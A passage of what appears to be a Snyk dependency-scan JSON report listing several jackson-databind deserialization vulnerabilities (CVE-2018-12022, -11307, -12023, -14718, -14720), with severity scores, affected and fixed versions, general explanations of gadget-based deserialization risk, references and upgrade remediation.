is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", + "epssDetails": { + "percentile": "0.81303", + "probability": "0.00770", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12022" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cjjf-94ff-43w7", + "GHSA-wrr7-33fx-rcvj" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:11:34.234921Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:00:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:00:03Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:36.643590Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2032", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:53.818908Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", + "epssDetails": { + "percentile": "0.85803", + "probability": "0.01278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11307" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qr7j-h6gg-jmgc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:14:00.916831Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-10T17:10:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:10:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:26.624837Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2058", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.092429Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", + "epssDetails": { + "percentile": "0.82708", + "probability": "0.00890", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12023" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6wqp-v4v6-c87c" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:16:09.944095Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:15:50Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:15:49Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:43.326081Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.637612Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.92634", + "probability": "0.04626", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14718" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-645p-88qh-w398" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:07.540945Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:19:49Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:19:41Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:22.234808Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.195569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using 